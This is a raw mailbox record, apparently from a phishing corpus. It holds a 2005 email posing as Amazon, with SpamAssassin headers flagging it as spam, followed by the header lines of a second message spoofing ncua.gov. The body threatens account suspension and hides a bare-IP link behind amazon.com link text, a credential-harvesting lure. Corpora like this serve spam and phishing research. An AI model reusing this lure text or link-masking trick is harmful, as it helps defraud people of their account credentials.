From: "Amazon" <service@amazon.com>
To: jose@monkey.org
Subject: Revision to Your Amazon.com Information 
MIME-Version: 1.0 
Reply-To: "Amazon" <support-glMPPP05635294service@amazon.com>
Content-type: text/html; charset="charset="iso-8859-1" 
Content-transfer-encoding: 7Bit 
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: *******
X-Spam-Status: Yes, score=7.9 required=5.0 tests=HTML_40_50,
	HTML_IMAGE_ONLY_20,HTML_MESSAGE,HTML_TAG_EXIST_TBODY,MIME_HTML_ONLY,
	NORMAL_HTTP_TO_IP,RAZOR2_CF_RANGE_51_100,RAZOR2_CHECK,
	RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_XBL,RCVD_NUMERIC_HELO autolearn=no 
	version=3.0.2
X-Spam-Report: 
	*  1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_40_50 BODY: Message is 40% to 50% HTML
	*  0.4 HTML_IMAGE_ONLY_20 BODY: HTML: images with 1600-2000 bytes of words
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?207.44.244.58>]
	*  3.1 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
	*      [207.44.244.58 listed in sbl-xbl.spamhaus.org]
Message-Id: <20051105175035.CE4D56FA31E@mail2.monkey.org>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 422

<HTML>
<BODY>

<br><br><table style="width:900px" cellpadding="0" cellspacing="0" border="0" align="center">
	<tr>
<img SRC="http://g-images.amazon.com/images/G/01/nav/amazon/amzn-logo-118w.gif"  BORDER=0 height=23 width=100>
	</tr>

<P><BR><BR>
<P class=style6>
<P class=style4 align=left><SPAN class=style7>At the last reviewing at your amazon account we discovered that your information is inaccurate. We apologize for this but because most frauds are possible because we don't have enough information about our clients, we require this verification. Please login and reenter  your personal information</SPAN>. 
<P class=style2 align=center>
<P class=style7 align=left>Please follow this link to update your personal information: 
<P class=style2 align=left><BR>
<P>
<P class=style2 align=left><A class=style3 href="http://202.44.8.40/work/amazon.com/exec/obidos?home.html/104-2497720-5229513" target="_blank" > http://www.amazon.com/exec/obidos/sign-in.html</A> 
<P class=style5 align=left>(To complete the verification process you must fill in all the required fields) 
<P>
<P>
<P>
<P><SPAN class=style3>Please note: </SPAN><SPAN class=style7>If you don't update your information within next 48 hours , we will be forced to suspend your account untill you have the time to contact us by phone</SPAN>. 
<P>
<P>We apreciate your support and understanding, as we work together to keep amazon market a safe place to trade. Thank you for your attention on this serious matter and we apologize. <BR>
<P>
<TABLE cellSpacing=0 cellPadding=0>
</TD></TR></TBODY></TABLE>
<HR align=left SIZE=1>
<SPAN class=style10>This message was generated automatically, please do not reply to it. Amazon treats your personal information with the utmost care, and our Privacy Policy is designed to protect you and your information.</SPAN> 
<HR noShade SIZE=1>
</TD></TR></TABLE>

From acc-validity@ncua.gov  Sun Nov  6 06:00:42 2005
Return-Path: <acc-validity@ncua.gov>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 02BE6536F43
	for <jose@login.monkey.org>; Sun,  6 Nov 2005 06:00:42 -0500 (EST)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 59D7F6FA2A2
	for <jose@monkey.org>; Sun,  6 Nov 2005 06:00:37 -0500 (EST)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Sun,  6 Nov 2005 06:00:37 -0500 (EST)
Received: by lujan.uninet.edu (Postfix)
	id 099BD1BC53; Sun,  6 Nov 2005 12:00:37 +0100 (CET)
Delivered-To: umeet@uninet.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP
	id CC3D91BC4D; Sun,  6 Nov 2005 11:00:34 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 14325-08; Sun, 6 Nov 2005 12:00:01 +0100 (CET)
Received: from 87.233.128.221 (unknown [87.233.128.221])
	by lujan.uninet.edu (Postfix) with SMTP
	id 250A41BC3B; Sun,  6 Nov 2005 11:59:57 +0100 (CET)
Received: from 128.12.42.240 by ; Sun, 06 Nov 2005 12:53:46 +0200
Message-ID: <VCBFAXQWYYDTBNFSWMLFZ@earthlink.net>
